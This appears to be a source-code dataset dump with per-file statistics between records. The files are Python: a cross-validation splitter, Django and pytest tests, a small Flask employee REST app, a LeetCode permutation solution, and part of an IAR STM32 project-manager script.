# for k in range(n_classes):
# np.random.shuffle(indices_per_class[k])
return indices_per_class, n_classes
def update_chosen_classes(self):
"""
For evaluation on the data from a subset of authors, this method re-samples the picked authors.
If all the authors should be used, it keeps selecting the complete set of authors.
"""
chosen_classes = np.random.choice(self._n_classes, self.config.n_classes(), replace=False) \
if self.config.n_classes() is not None \
else np.arange(self._n_classes)
self.__chosen_classes = chosen_classes
def _split_train_test(self, loader: PathMinerLoader, fold_ind: Union[int, Tuple[int, int]], pad: bool = False) \
-> Tuple[PathMinerDataset, PathMinerDataset]:
"""
Creates train and test datasets. The type of the experiment (regular, context, time) is controlled by the config
passed to the Classifier object at the initialization step. Fold index is used to tell which part of data to
use for testing (selected fold in cross-validation, test slice for 'time', or test subset of code snippets for
'context').
:param loader: data loader
:param fold_ind: part of data used for testing (number in case of cross-validation or 'context', two numbers for 'time')
:param pad: whether to pad data (used for preparing tensors for the Neural Network model)
:return: a tuple of training and testing datasets
"""
chosen_classes = self.__chosen_classes
if self.config.mode() == 'time':
train_fold, test_fold = fold_ind
train_indices = self._loader.time_buckets() == train_fold
test_indices = self._loader.time_buckets() == test_fold
elif self.config.mode() == 'context':
train_indices = self._loader.context_indices(fold_ind) == PickType.TRAIN
test_indices = self._loader.context_indices(fold_ind) == PickType.TEST
else:
test_size = self.config.test_size()
if isinstance(test_size, int):
start_ind = fold_ind * test_size
train_indices = np.concatenate([
np.concatenate((inds[:min(inds.size, start_ind)], inds[min(inds.size, start_ind + test_size):]))
for inds in self.__indices_per_class[chosen_classes]
])
test_indices = np.concatenate([
inds[min(inds.size, start_ind):min(inds.size, start_ind + test_size)]
for inds in self.__indices_per_class[chosen_classes]
])
else:
train_indices = np.concatenate([
np.concatenate((inds[:ceil(test_size * inds.size) * fold_ind],
inds[min(inds.size, ceil(test_size * inds.size) * (fold_ind + 1)):]))
for inds in self.__indices_per_class[chosen_classes]
])
test_indices = np.concatenate([
inds[
ceil(test_size * inds.size) * fold_ind:min(inds.size, ceil(test_size * inds.size) * (fold_ind + 1))]
for inds in self.__indices_per_class[chosen_classes]
])
train_indices = np.array(train_indices, dtype=np.int32)
test_indices = np.array(test_indices, dtype=np.int32)
return self._create_datasets(loader, train_indices, test_indices, pad)
def _create_datasets(self, loader, train_indices, test_indices, pad) -> Tuple[PathMinerDataset, PathMinerDataset]:
"""
:return: datasets for training and testing
"""
return PathMinerDataset.from_loader(loader, train_indices, pad), \
PathMinerDataset.from_loader(loader, test_indices, pad)
def cross_validation_folds(self) -> List[int]:
"""
:return: a list of fold indices depending on the test size passed in config
"""
test_size = self.config.test_size()
if isinstance(test_size, float):
return list(range(int(np.ceil(1. / test_size))))
else:
return list(range((int(np.ceil(max([inds.size for inds in self.__indices_per_class]) / test_size)))))
| 47.845714
| 128
| 0.651618
| 1,026
| 8,373
| 5.087719
| 0.208577
| 0.024521
| 0.034483
| 0.021839
| 0.2341
| 0.222605
| 0.200383
| 0.180843
| 0.146552
| 0.146552
| 0
| 0.002393
| 0.251403
| 8,373
| 174
| 129
| 48.12069
| 0.830408
| 0.203272
| 0
| 0.151261
| 0
| 0
| 0.016152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067227
| false
| 0
| 0.092437
| 0
| 0.218487
| 0.008403
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5734519608276ff9f8fee5a5bd77871ef93780f
| 4,461
|
py
|
Python
|
tests/test_renderers.py
|
adamchainz/classy-django-rest-framework
|
19f57d88d13f5ddd2ee33a3239c51e97829e5e6f
|
[
"MIT"
] | null | null | null |
tests/test_renderers.py
|
adamchainz/classy-django-rest-framework
|
19f57d88d13f5ddd2ee33a3239c51e97829e5e6f
|
[
"MIT"
] | null | null | null |
tests/test_renderers.py
|
adamchainz/classy-django-rest-framework
|
19f57d88d13f5ddd2ee33a3239c51e97829e5e6f
|
[
"MIT"
] | null | null | null |
import unittest
from mock import mock_open, patch
from rest_framework.generics import ListAPIView
from rest_framework_ccbv.renderers import (
BasePageRenderer, IndexPageRenderer, LandPageRenderer, ErrorPageRenderer,
SitemapRenderer, DetailPageRenderer,
)
from rest_framework_ccbv.config import VERSION
from rest_framework_ccbv.inspector import Attributes
KLASS_FILE_CONTENT = (
'{"2.2": {"rest_framework.generics": ["RetrieveDestroyAPIView", "ListAPIView"]},'
'"%s": {"rest_framework.generics": ["RetrieveDestroyAPIView", "ListAPIView"]}}' % VERSION
)
class TestBasePageRenderer(unittest.TestCase):
def setUp(self):
self.renderer = BasePageRenderer([ListAPIView])
self.renderer.template_name = 'base.html'
@patch('rest_framework_ccbv.renderers.BasePageRenderer.get_context', return_value={'foo': 'bar'})
@patch('rest_framework_ccbv.renderers.templateEnv.get_template')
@patch('rest_framework_ccbv.renderers.open', new_callable=mock_open)
def test_render(self, mock_open, get_template_mock, get_context_mock):
self.renderer.render('foo')
mock_open.assert_called_once_with('foo', 'w')
handle = mock_open()
handle.write.assert_called_once()
get_template_mock.assert_called_with('base.html')
get_template_mock.return_value.render.assert_called_with({'foo': 'bar'})
@patch('rest_framework_ccbv.renderers.templateEnv.get_template')
@patch('rest_framework_ccbv.renderers.open', mock_open())
def test_context(self, get_template_mock):
self.renderer.render('foo')
context = get_template_mock.return_value.render.call_args_list[0][0][0]
assert context['version_prefix'] == 'Django REST Framework'
assert context['version']
assert context['versions']
assert context['other_versions']
assert context['klasses'] == [ListAPIView]
class TestStaticPagesRenderered(unittest.TestCase):
def setUp(self):
self.rendererIndex = IndexPageRenderer([ListAPIView])
self.rendererLandPage = LandPageRenderer([ListAPIView])
self.rendererErrorPage = ErrorPageRenderer([ListAPIView])
@patch('rest_framework_ccbv.renderers.templateEnv.get_template')
@patch('rest_framework_ccbv.renderers.open', mock_open())
def test_template_name(self, get_template_mock):
self.rendererIndex.render('foo')
get_template_mock.assert_called_with('index.html')
self.rendererLandPage.render('foo')
get_template_mock.assert_called_with('home.html')
self.rendererErrorPage.render('foo')
get_template_mock.assert_called_with('error.html')
class TestSitemapRenderer(unittest.TestCase):
def setUp(self):
self.renderer = SitemapRenderer([ListAPIView])
@patch('rest_framework_ccbv.renderers.templateEnv.get_template')
@patch('rest_framework_ccbv.renderers.open', mock_open(read_data='{}'))
def test_context(self, get_template_mock):
self.renderer.render('foo')
context = get_template_mock.return_value.render.call_args_list[0][0][0]
assert context['latest_version']
assert context['base_url']
assert context['klasses'] == {}
class TestDetailPageRenderer(unittest.TestCase):
# @patch('rest_framework_ccbv.renderers.open', mock_open(read_data='{}'))
def setUp(self):
self.renderer = DetailPageRenderer(
[ListAPIView], ListAPIView.__name__, ListAPIView.__module__)
@patch('rest_framework_ccbv.renderers.templateEnv.get_template')
@patch('rest_framework_ccbv.renderers.open', mock_open(read_data=KLASS_FILE_CONTENT))
@patch('rest_framework_ccbv.inspector.open', mock_open(read_data=KLASS_FILE_CONTENT))
def test_context(self, get_template_mock):
self.renderer.render('foo')
context = get_template_mock.return_value.render.call_args_list[0][0][0]
assert context['other_versions'] == ['2.2']
assert context['name'] == ListAPIView.__name__
assert isinstance(context['ancestors'], (list, tuple))
assert isinstance(context['direct_ancestors'], (list, tuple))
assert isinstance(context['attributes'], Attributes)
assert isinstance(context['methods'], Attributes)
assert context['this_klass'] == ListAPIView
assert isinstance(context['children'], list)
assert context['this_module'] == ListAPIView.__module__
assert isinstance(context['unavailable_methods'], set)
| 44.61
| 101
| 0.726743
| 498
| 4,461
| 6.210843
| 0.178715
| 0.084061
| 0.087941
| 0.109279
| 0.511801
| 0.444552
| 0.387326
| 0.361461
| 0.305852
| 0.305852
| 0
| 0.003438
| 0.152432
| 4,461
| 99
| 102
| 45.060606
| 0.814599
| 0.015916
| 0
| 0.256098
| 0
| 0
| 0.224476
| 0.145397
| 0
| 0
| 0
| 0
| 0.304878
| 1
| 0.109756
| false
| 0
| 0.073171
| 0
| 0.231707
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a57349956429b4d3071a79222d869b969895aec7
| 1,320
|
py
|
Python
|
emailpal/tests/test_views.py
|
18F/django-email-pal
|
7471342741d814d19713d4353a3f566e490177a4
|
[
"CC0-1.0"
] | 5
|
2017-05-25T00:51:55.000Z
|
2020-06-13T16:37:42.000Z
|
emailpal/tests/test_views.py
|
18F/django-email-pal
|
7471342741d814d19713d4353a3f566e490177a4
|
[
"CC0-1.0"
] | 30
|
2017-05-25T00:41:45.000Z
|
2017-09-15T23:27:45.000Z
|
emailpal/tests/test_views.py
|
18F/django-email-pal
|
7471342741d814d19713d4353a3f566e490177a4
|
[
"CC0-1.0"
] | 2
|
2017-05-25T17:30:30.000Z
|
2021-02-14T11:32:33.000Z
|
import pytest
from django.conf.urls import include, url
from django.test import Client, override_settings
from .util import all_template_engines
from .test_sendable_email import MY_SENDABLE_EMAIL
urlpatterns = [
url(r'^examples/', include('emailpal.urls')),
]
@pytest.fixture
def client():
with override_settings(SENDABLE_EMAILS=[MY_SENDABLE_EMAIL],
ROOT_URLCONF=__name__):
yield Client()
@pytest.mark.parametrize('template_engine', all_template_engines())
def test_index_works(client, template_engine):
with template_engine.enable():
response = client.get('/examples/')
assert response.status_code == 200
assert 'MySendableEmail' in response.content.decode('utf-8')
def test_invalid_example_raises_404(client):
response = client.get('/examples/blarg.html')
assert response.status_code == 404
def test_valid_html_example_works(client):
response = client.get('/examples/{}.html'.format(MY_SENDABLE_EMAIL))
assert response.status_code == 200
assert 'I am HTML' in response.content.decode('utf-8')
def test_valid_plaintext_example_works(client):
response = client.get('/examples/{}.txt'.format(MY_SENDABLE_EMAIL))
assert response.status_code == 200
assert 'I am plaintext' in response.content.decode('utf-8')
| 31.428571
| 72
| 0.731818
| 170
| 1,320
| 5.429412
| 0.358824
| 0.070423
| 0.065005
| 0.108342
| 0.388949
| 0.355363
| 0.290358
| 0.197183
| 0.12351
| 0.12351
| 0
| 0.016144
| 0.155303
| 1,320
| 41
| 73
| 32.195122
| 0.811659
| 0
| 0
| 0.1
| 0
| 0
| 0.116667
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a57546dcf10db7ae680036449e4ff2d0de0b36d3
| 2,328
|
py
|
Python
|
employee-management/app.py
|
desitomato/flask-docker
|
03dadddfbda478180554f3364e91af41b72dce87
|
[
"MIT"
] | null | null | null |
employee-management/app.py
|
desitomato/flask-docker
|
03dadddfbda478180554f3364e91af41b72dce87
|
[
"MIT"
] | null | null | null |
employee-management/app.py
|
desitomato/flask-docker
|
03dadddfbda478180554f3364e91af41b72dce87
|
[
"MIT"
] | null | null | null |
import os
from flask import Flask, request, jsonify
from flask_restful import Api
from resources.company import Company, Companylist
from resources.employee import Employee, EmployeeList
from db import db
from resources.user import UserRegister, UserLogin, UserLogout
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'prateek'
api = Api(app)
@app.before_first_request
def create_tables():
db.create_all()
api.add_resource(Company, '/company/<string:name>')
api.add_resource(Companylist, '/company')
api.add_resource(Employee, '/employee/<string:name>')
api.add_resource(EmployeeList, '/employee')
api.add_resource(UserRegister, '/register')
api.add_resource(UserLogin, '/login')
api.add_resource(UserLogout, '/logout/<string:username>')
if __name__ == '__main__':
db.init_app(app)
app.run(port=5000, debug=True)
#API's without flask_restful
""" companies = [{
'name': 'samsung',
'employees': [{
'name':'prateek',
'salary':10000
}]
}]
@app.route('/company', methods=['POST'])
def create_company():
request_data = request.get_json()
new_company = {'name': request_data['name'],
'employees': []
}
companies.append(new_company)
return jsonify(new_company), 201
@app.route('/company/<string:name>')
def get_company(name):
for company in companies:
if company['name'] == name:
return jsonify(company), 200
@app.route('/company')
def get_company_list():
return jsonify(companies), 200
@app.route('/company/<string:name>/employee', methods=['POST'])
def create_employee_in_company(name):
request_data = request.get_json()
print(request_data)
for company in companies:
if company['name'] == name:
new_employee = {
'name' : request_data['name'],
'salary': request_data['salary']
}
company['employees'].append(new_employee)
return jsonify(new_employee), 201
@app.route('/company/<string:name>/employee')
def get_employee_in_company(name):
for company in companies:
if company['name'] == name:
return jsonify(company['employees']), 200 """
| 25.582418
| 91
| 0.668814
| 278
| 2,328
| 5.399281
| 0.273381
| 0.027981
| 0.06529
| 0.041972
| 0.247169
| 0.181879
| 0.117255
| 0.117255
| 0.091939
| 0.091939
| 0
| 0.012678
| 0.186856
| 2,328
| 90
| 92
| 25.866667
| 0.780243
| 0.011598
| 0
| 0
| 0
| 0
| 0.203476
| 0.125767
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.28
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a57859ecd89b9b31c6238458c1c3953448a728df
| 1,234
|
py
|
Python
|
leetcode/31.py
|
sputnikW/algorithm
|
2c9412d7fc4fdb7f71c31ee3310833014272f0c9
|
[
"MIT"
] | null | null | null |
leetcode/31.py
|
sputnikW/algorithm
|
2c9412d7fc4fdb7f71c31ee3310833014272f0c9
|
[
"MIT"
] | null | null | null |
leetcode/31.py
|
sputnikW/algorithm
|
2c9412d7fc4fdb7f71c31ee3310833014272f0c9
|
[
"MIT"
] | null | null | null |
class Solution:
def nextPermutation(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
lenNums = len(nums)
if lenNums == 1:
return
maxFromTail = -1
for i in range(lenNums - 2, -1, -1):
maxFromTail = max(nums[i + 1], maxFromTail)
if nums[i] < maxFromTail:
# find the closest number in the end of array form right to left
indexOfminDelta = -1
for j in range(lenNums - 1, i, -1):
if nums[j] - nums[i] > 0:
indexOfminDelta = j
break
# swap curr number with the closest number
temp = nums[indexOfminDelta]
nums[indexOfminDelta] = nums[i]
nums[i] = temp
# reverse the right part asc in-place
k, l = i + 1, lenNums - 1
while k < l:
temp = nums[k]
nums[k] = nums[l]
nums[l] = temp
k += 1
l -= 1
return
nums.reverse()
return
"""
T=O(N)
"""
| 30.097561
| 80
| 0.423015
| 131
| 1,234
| 3.984733
| 0.419847
| 0.047893
| 0.05364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022082
| 0.486224
| 1,234
| 41
| 81
| 30.097561
| 0.801262
| 0.157212
| 0
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a57e42b92567d730da83f49a7ddb9cffb40477e6
| 28,338
|
py
|
Python
|
ipm.py
|
AVilezhaninov/STM32_IAR_ProjectManager
|
906c34c70715d5ceec4937fb8d9705318017b3e9
|
[
"MIT"
] | null | null | null |
ipm.py
|
AVilezhaninov/STM32_IAR_ProjectManager
|
906c34c70715d5ceec4937fb8d9705318017b3e9
|
[
"MIT"
] | 4
|
2017-03-10T13:06:46.000Z
|
2017-03-10T13:24:00.000Z
|
ipm.py
|
AVilezhaninov/STM32_IAR_ProjectManager
|
906c34c70715d5ceec4937fb8d9705318017b3e9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# MIT License
# Copyright (c) 2017 Aleksey Vilezhaninov
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import os
import sys
import shutil
from lxml import etree
# ------------------------------------------------------------------------------
# Help messages ----------------------------------------------------------------
# ------------------------------------------------------------------------------
MAIN_HELP_MESSAGE = '''
IPM - IAR Embedded Workbench project manager for STM32F M0, M3, M4, M7 MCU.
Program capabilities:
- create new project with standart ST CMSIS files;
- add folder struct to existing project;
- clean EWARM workspace folder;
- rename existing workspace and project;
usage: ipm <command> <args> [-h | --help]
commands:
create Create new project
add_folder Copy folder to project and add folder to project file
clean Clean workspace folder
rename_workspace Rename workspace
rename_project Rename project
rename Rename both workspace and project
For details use: ipm <command> -h
IPM v0.1 Copyright (c) 2017 Aleksey Vilezhaninov a.vilezhaninov@gmail.com
'''
CREATE_HELP_MESSAGE = '''
Create new IAR EWARM project with specified name and device.
usage: ipm create <name> <device> [-h | --help]
parameters:
-n, --name <name> New project name
-d, --device <device> New project device
Device must be specified as in "CMSIS/Device/ST/STM32Fxxx/Include/stm32fxxx.h".
For usage - download IPM executable file, IPM "template" folder and
standart ST CMSIS folder in the same folder and run program.
'''
ADD_FOLDER_HELP_MESSAGE = '''
Copy folder to project source directory and ddd folder to project file.
usage: ipm add_folder <project_path> <folder_path> [ignore] [-h | --help]
parameters:
-p, --project_path <path> Project path
-f, --folder_path <path> Folder path
-i, --ignore <ignore> Ignore file extentions
For usage - just specify project path, folder to add path and ignore
extentions devided with "/" char (for example "-i c/h/cpp/icf/").
'''
CLEAN_HELP_MESSAGE = '''
Clean workspace folder - delete all files and folders except *.eww and *.ewp.
usage: ipm clean <workspace_path> [-h | --help]
parameters:
-w, --workspace_path <path> Workspace path
For usage - just specify workspace path.
'''
RENAME_WORKSPACE_HELP_MESSAGE = '''
Rename workspace with specified name.
usage: ipm rename_workspace <workspace_path> <name> [-h | --help]
parameters:
-w, --workspace_path <path> Workspace path
-n, --name <name> New workspace name
For usage - just specify workspace path and new workspace name.
'''
RENAME_PROJECT_HELP_MESSAGE = '''
Rename project with specified name.
usage: ipm rename_project <project_path> <workspace_path> <name> [-h | --help]
parameters:
-p, --project_path <path> Project path
-w, --workspace_path <path> Workspace path
-n, --name <name> New project name
For usage - just specify project path, workspace containing this project path
and new project name.
'''
RENAME_HELP_MESSAGE = '''
Rename both workspace and project with specified name.
usage: ipm rename <project_path> <workspace_path> <name> [-h | --help]
parameters:
-p, --project_path <path> Project path
-w, --workspace_path <path> Workspace path
-n, --name <name> New project name
For usage - just specify project path, workspace containing this project path
and new project name.
'''
# ------------------------------------------------------------------------------
# Argparser configuration
# ------------------------------------------------------------------------------
def CreateArgParser():
# Parser config ------------------------------------------------------------
parser = argparse.ArgumentParser(add_help = False)
parser.add_argument("-h", "--help", action = "store_const", const = True)
subparsers = parser.add_subparsers(dest = "command")
# Create command -----------------------------------------------------------
create_parser = subparsers.add_parser("create", add_help = False)
create_parser.add_argument("-n", "--name", help = "New project name")
create_parser.add_argument("-d", "--device", help = "New project device")
create_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Add folder command -------------------------------------------------------
add_folder_parser = subparsers.add_parser("add_folder", add_help = False)
add_folder_parser.add_argument("-p", "--project_path",
help = "Project path")
add_folder_parser.add_argument("-f", "--folder_path",
help = "Folder path")
add_folder_parser.add_argument("-i", "--ignore",
help = "Ignore extentions")
add_folder_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Clean command ------------------------------------------------------------
clean_parser = subparsers.add_parser("clean", add_help = False)
clean_parser.add_argument("-w", "--workspace_path", help = "Workspace path")
clean_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename workspace command -------------------------------------------------
rename_workspace_parser = subparsers.add_parser("rename_workspace",
add_help = False)
rename_workspace_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_workspace_parser.add_argument("-n", "--name",
help = "New workspace name")
rename_workspace_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename project command ---------------------------------------------------
rename_project_parser = subparsers.add_parser("rename_project",
add_help = False)
rename_project_parser.add_argument("-p", "--project_path",
help = "Project path")
rename_project_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_project_parser.add_argument("-n", "--name",
help = "New project name")
rename_project_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
# Rename command -----------------------------------------------------------
rename_parser = subparsers.add_parser("rename", add_help = False)
rename_parser.add_argument("-p", "--project_path",
help = "Project path")
rename_parser.add_argument("-w", "--workspace_path",
help = "Workspace path")
rename_parser.add_argument("-n", "--name",
help = "New project and workspace name")
rename_parser.add_argument("-h", "--help", help = "Help",
action = "store_const", const = True)
return parser
# ------------------------------------------------------------------------------
# Create new IAR EWARM project with specified name and device
# ------------------------------------------------------------------------------
def Create(project_name, project_device):
if not os.path.exists(project_name):
if project_device.lower()[0:6] == "stm32f":
# Copy source files and folders
CopyEWARMFiles(project_name)
CopyCMSISFiles(project_name, project_device)
ChangeProjectFile(project_name, project_device)
# Create user folders
MakeDir(project_name + "/source/user/inc")
MakeDir(project_name + "/source/user/src")
# Copy main.c to project source folder
shutil.copy2("./template/template_main.c",
project_name + "/source")
text_to_replace = '#include "stm32f4xx.h"'
replace_text = '#include "stm32f' + project_device[6] + 'xx.h"'
ReplaceTextInFile(project_name + "/source/template_main.c",
text_to_replace, replace_text)
# Rename template_main.c
rename_path = project_name + "/source"
try:
os.rename(rename_path + "/template_main.c",
rename_path + "/main.c")
except OSError:
Exit("Can not rename \"" + rename_path +
"/template_main.c\" file")
else:
Exit("Undefined device")
else:
Exit("\"" + project_name + "\" folder already exists")
# Copy and rename EWARM workspace and project template files
def CopyEWARMFiles(project_name):
if os.path.exists("template"):
# Create EWARM folder
MakeDir(project_name + "/EWARM")
# Copy template files
src = "template/template.eww"
dst = project_name + "/EWARM"
CopyFile(src, dst)
src = "template/template.ewp"
dst = project_name + "/EWARM"
CopyFile(src, dst)
# Rename template files in EWARM folder
project_file = project_name + "/EWARM/template.ewp"
workspace_file = project_name + "/EWARM/template.eww"
RenameProject(project_file, workspace_file, project_name)
RenameWorkspace(workspace_file, project_name)
else:
Exit("Can not find \"template\" folder")
# Copy CMSIS files in project CMSIS folder
def CopyCMSISFiles(project_name, project_device):
device = project_device.lower()
device_family = project_device[0:7].upper() + "xx"
if os.path.exists("CMSIS"):
# Copy ./CMSIS/Include folder with all files
src = "CMSIS/Include"
dst = project_name + "/source/CMSIS/Include"
CopyTree(src, dst)
# Copy CMSIS"s files and create folders
directory = project_name + "/source/CMSIS/Lib/ARM"
MakeDir(directory)
directory = project_name + "/source/CMSIS/Device/ST/"
directory += device_family + "/Include"
MakeDir(directory)
directory = project_name + "/source/CMSIS/Device/ST/"
directory += device_family + "/Source/iar/linker"
MakeDir(directory)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/" + device_family.lower() + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/" + device + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Include/system_" + device_family.lower() + ".h"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Include"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/" + "system_" + device_family.lower() + ".c"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/iar/" + "startup_" + device + ".s"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source/iar"
CopyFile(src, dst)
src = "CMSIS/Device/ST/" + device_family
src += "/Source/Templates/iar/linker/" + device + "_flash.icf"
dst = project_name + "/source/CMSIS/Device/ST/"
dst += device_family + "/Source/iar/linker"
CopyFile(src, dst)
else:
Exit("Can not find \"CMSIS\" folder")
# Change template lines in project file
def ChangeProjectFile(project_name, device):
device = device.lower()
device_family = device[0:7].upper() + "xx"
# Define project file path
project_file = project_name + "/EWARM/" + project_name + ".ewp"
# Define path to CMSIS device family folder
CMSIS_ST_template_path = "$PROJ_DIR$\..\source\CMSIS\Device\ST\STM32F4xx"
CMSIS_ST_path = "$PROJ_DIR$\..\source\CMSIS\Device\ST\\" + device_family
# Repalce device definition
text_to_replace = "STM32F407xx"
replace_text = device.upper()[0:9] + device.lower()[9:]
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace CMSIS include path
text_to_replace = CMSIS_ST_template_path + "\Include"
replace_text = CMSIS_ST_path + "\Include"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace linker path
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\linker\stm32f407xx_flash.icf"
replace_text = CMSIS_ST_path
replace_text += "\Source\iar\linker\\" + device + "_flash.icf"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Repalce folder and file paths
text_to_replace = "<name>STM32F4xx</name>"
replace_text = "<name>" + device_family + "</name>"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\stm32f407xx.h"
replace_text = CMSIS_ST_path + "\Include\\" + device + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\stm32f4xx.h"
replace_text = CMSIS_ST_path + "\Include\\" + device_family.lower() + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Include\system_stm32f4xx.h"
replace_text = CMSIS_ST_path + "\Include\system_"
replace_text += device_family.lower() + ".h"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\linker\stm32f412rx_flash.icf"
replace_text = CMSIS_ST_path +"\Source\iar\linker\\" + device + "_flash.icf"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path
text_to_replace += "\Source\iar\startup_stm32f407xx.s"
replace_text = CMSIS_ST_path + "\Source\iar\startup_" + device + ".s"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
text_to_replace = CMSIS_ST_template_path + "\Source\system_stm32f4xx.c"
replace_text = CMSIS_ST_path + "\Source\system_" + device_family + ".c"
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Define device core file
device_f_series = device[6]
if device_f_series == "0":
device_core = "core_cm0.h"
elif device_f_series == "1" or device_f_series == "2":
device_core = "core_cm3.h"
elif device_f_series == "3" or device_f_series == "4":
device_core = "core_cm4.h"
elif device_f_series == "7":
device_core = "core_cm7.h"
else:
Exit("Can not define device core")
text_to_replace = "$PROJ_DIR$\..\source\CMSIS\Include\core_cm4.h"
replace_text = "$PROJ_DIR$\..\source\CMSIS\Include\\" + device_core
ReplaceTextInFile(project_file, text_to_replace, replace_text)
# Replace output .hex and .out files name
ReplaceTextInFile(project_file, "template.hex", project_name + ".hex")
ReplaceTextInFile(project_file, "tempalte.out", project_name + ".out")
# ------------------------------------------------------------------------------
# Copy folder to project source directory. Add folder in project file
# ------------------------------------------------------------------------------
def AddFolder(project_path, folder_path, ignore_list):
if os.path.isfile(project_path):
if project_path.endswith(".ewp"):
if os.path.exists(folder_path):
# Copy folder to project
folder_path = DecoratePath(folder_path)
src = folder_path
dst = "/".join(project_path.split("/")[0:-2])
dst += "/source/" + src.split("/")[-1]
if os.path.exists(dst):
Exit("Folder \"" + dst + "\" exists")
CopyTree(src, dst)
# Add folder struct in project file
tree = etree.parse(project_path)
root = tree.getroot()
start_path_pos = len(folder_path.split("/")) - 1
elements = ParseFolder(folder_path, etree.Element("project"),
ignore_list, start_path_pos, True)
for node in elements:
text_node = etree.tostring(node, pretty_print = True)
root.append(etree.XML(text_node))
xml_file = open(project_path, "wb")
xml_file.write(etree.tostring(root, pretty_print = True,
encoding = "iso-8859-1", xml_declaration = True))
xml_file.close()
else:
Exit("Can not find \"" + folder_path + "\" folder")
else:
